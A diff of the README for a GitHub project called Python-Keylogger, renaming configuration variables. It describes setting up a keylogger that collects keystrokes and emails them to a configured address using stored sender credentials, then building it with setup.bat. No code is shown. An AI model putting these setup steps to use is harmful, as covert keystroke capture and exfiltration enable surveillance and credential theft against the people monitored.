Yunchao/Python-Keylogger/README.md

 NOTE: Python 3 users may experience issues when attempting to build the executable file
 ## Setting up:
 #### 1. fill in the following in keylogger.py:
-* Destination email Address (destEmail): The email to send results to.
+* Destination email Address (DEST\_EMAIL): The email to send results to.
 The current email target is the source email.
-* Source Email Information (srcEmail/srcPwd): This is the email that the result are sent from.
+* Source Email Information (SRC\_EMAIL/SRC\_PWD): This is the email that the result are sent from.
-* Buffer Size (dataBufferSize): The number of characters that are collected before the email is sent.
+* Buffer Size (DATA\_BUFFER\_SIZE): The number of characters that are collected before the email is sent.

 #### 2. Run **setup.bat**.